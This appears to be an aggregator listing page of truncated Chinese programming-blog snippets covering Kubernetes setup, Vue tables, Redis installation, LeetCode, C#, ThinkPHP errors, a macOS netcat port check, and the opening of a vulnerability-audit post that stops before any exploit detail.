1. 基础环境优化 hostnamectl set-hostname master1 && bash hostnamectl set-hostname node1 && bash hostnamectl set-hostname node2 && bashcat >> /etc/hosts << EOF 192.168.0.34 master1 192.168.0.45 node1 192.168.0.209…...

vue3 element-plus 组件table表格 勾选框回显(初始化默认回显)完整静态代码

<template><el-table ref"multipleTableRef" :data"tableData" style"width: 100%"><el-table-column type"selection" width"55" /><el-table-column label"时间" width"120">…...

Redis --- 安装教程

Redis--- 特性&#xff0c;使用场景&#xff0c;安装 安装教程在Ubuntu下安装在Centos7.6下安装Redis5 特性在内存中存储数据可编程的扩展能力持久化集群高可用快速 应用场景实时数据存储作为缓存或者Session存储消息队列 安装教程 &#x1f680;安装之前切换到root用户。 在…...

代码阅读:LanGCN

toc 1训练 1.1 进度条 import tqdm as tqdm for i, data in tqdm(enumerate(train_loader),disablehvd.rank()):1.2 多进程通信 多线程通信依靠共享内存实现&#xff0c;但是多进程通信就麻烦很多&#xff0c;因此可以采用mpi库&#xff0c;如果是在python中使用&#xff0…...

基于Java的校园餐厅订餐管理系统设计与实现(源码+lw+部署文档+讲解等)

文章目录 前言具体实现截图论文参考详细视频演示为什么选择我自己的网站自己的小程序&#xff08;小蔡coding&#xff09; 代码参考数据库参考源码获取 前言 &#x1f497;博主介绍&#xff1a;✌全网粉丝10W,CSDN特邀作者、博客专家、CSDN新星计划导师、全栈领域优质创作者&am…...

使用C#和Flurl.Http库的下载器程序

根据您的要求&#xff0c;我为您编写了一个使用C#和Flurl.Http库的下载器程序&#xff0c;用于下载凤凰网的图片。以下是一个简单的示例代码&#xff1a; using System; using Flurl.Http;namespace DownloadImage {class Program{static void Main(string[] args){string url…...

面试经典150题——Day19

文章目录 一、题目二、题解 一、题目 58. Length of Last Word Given a string s consisting of words and spaces, return the length of the last word in the string. A word is a maximal substring consisting of non-space characters only. Example 1: Input: s “…...

TP6首页加载报错 Call to a member function run() on null

最近新接入一个二开的项目&#xff0c;tp6的项目内置的composer.json文件里引入的topthink框架包文件却是"topthink/framework": "5.0.*",导致了以下错误&#xff1a; 错误&#xff1a; Fatal error: Uncaught Error: Call to a member function run() o…...

洗车小程序源码:10个必备功能,提升洗车体验

作为洗车行业的专家&#xff0c;我们深知在如今数字化时代&#xff0c;拥有一款功能强大的洗车小程序是提升用户体验和业务发展的关键。本文将向您介绍洗车小程序源码中的10个必备功能&#xff0c;让您的洗车业务达到新的高度。 在线预约系统 通过洗车小程序源码&#xff0c;…...

macOS telnet替代方式

前言 经过使用Linux&#xff0c;常常用Linux的telnet查看端口畅通&#xff0c;是否有防火墙&#xff0c;但是在mac上已经没有这个命令了&#xff0c;那么怎么使用这个命令或者有没有其他替代呢&#xff0c;win和linux是否可以使用相同的替代。macOS可以原生用nc命令替代&#…...

【根据当天日期输出明天的日期(需对闰年做判定)。】2022-5-15

缘由根据当天日期输出明天的日期(需对闰年做判定)。日期类型结构体如下&#xff1a; struct data{ int year; int month; int day;};-编程语言-CSDN问答 struct mdata{ int year; int month; int day; }mdata; int 天数(int year, int month) {switch (month){case 1: case 3:…...

springboot 百货中心供应链管理系统小程序

一、前言 随着我国经济迅速发展&#xff0c;人们对手机的需求越来越大&#xff0c;各种手机软件也都在被广泛应用&#xff0c;但是对于手机进行数据信息管理&#xff0c;对于手机的各种软件也是备受用户的喜爱&#xff0c;百货中心供应链管理系统被用户普遍使用&#xff0c;为方…...

8k长序列建模,蛋白质语言模型Prot42仅利用目标蛋白序列即可生成高亲和力结合剂

蛋白质结合剂&#xff08;如抗体、抑制肽&#xff09;在疾病诊断、成像分析及靶向药物递送等关键场景中发挥着不可替代的作用。传统上&#xff0c;高特异性蛋白质结合剂的开发高度依赖噬菌体展示、定向进化等实验技术&#xff0c;但这类方法普遍面临资源消耗巨大、研发周期冗长…...

Leetcode 3577. Count the Number of Computer Unlocking Permutations

Leetcode 3577. Count the Number of Computer Unlocking Permutations 1. 解题思路2. 代码实现 题目链接&#xff1a;3577. Count the Number of Computer Unlocking Permutations 1. 解题思路 这一题其实就是一个脑筋急转弯&#xff0c;要想要能够将所有的电脑解锁&#x…...

条件运算符

C中的三目运算符&#xff08;也称条件运算符&#xff0c;英文&#xff1a;ternary operator&#xff09;是一种简洁的条件选择语句&#xff0c;语法如下&#xff1a; 条件表达式 ? 表达式1 : 表达式2• 如果“条件表达式”为true&#xff0c;则整个表达式的结果为“表达式1”…...

苍穹外卖--缓存菜品

1.问题说明 用户端小程序展示的菜品数据都是通过查询数据库获得&#xff0c;如果用户端访问量比较大&#xff0c;数据库访问压力随之增大 2.实现思路 通过Redis来缓存菜品数据&#xff0c;减少数据库查询操作。 缓存逻辑分析&#xff1a; ①每个分类下的菜品保持一份缓存数据…...

C# 类和继承(抽象类)

抽象类 抽象类是指设计为被继承的类。抽象类只能被用作其他类的基类。 不能创建抽象类的实例。抽象类使用abstract修饰符声明。 抽象类可以包含抽象成员或普通的非抽象成员。抽象类的成员可以是抽象成员和普通带 实现的成员的任意组合。抽象类自己可以派生自另一个抽象类。例…...

优选算法第十二讲:队列 + 宽搜 优先级队列

优选算法第十二讲&#xff1a;队列 宽搜 && 优先级队列 1.N叉树的层序遍历2.二叉树的锯齿型层序遍历3.二叉树最大宽度4.在每个树行中找最大值5.优先级队列 -- 最后一块石头的重量6.数据流中的第K大元素7.前K个高频单词8.数据流的中位数 1.N叉树的层序遍历 2.二叉树的锯…...

HashMap中的put方法执行流程(流程图)

1 put操作整体流程 HashMap 的 put 操作是其最核心的功能之一。在 JDK 1.8 及以后版本中&#xff0c;其主要逻辑封装在 putVal 这个内部方法中。整个过程大致如下&#xff1a; 初始判断与哈希计算&#xff1a; 首先&#xff0c;putVal 方法会检查当前的 table&#xff08;也就…...

【网络安全】开源系统getshell漏洞挖掘

审计过程&#xff1a; 在入口文件admin/index.php中&#xff1a; 用户可以通过m,c,a等参数控制加载的文件和方法&#xff0c;在app/system/entrance.php中存在重点代码&#xff1a; 当M_TYPE system并且M_MODULE include时&#xff0c;会设置常量PATH_OWN_FILE为PATH_APP.M_T…...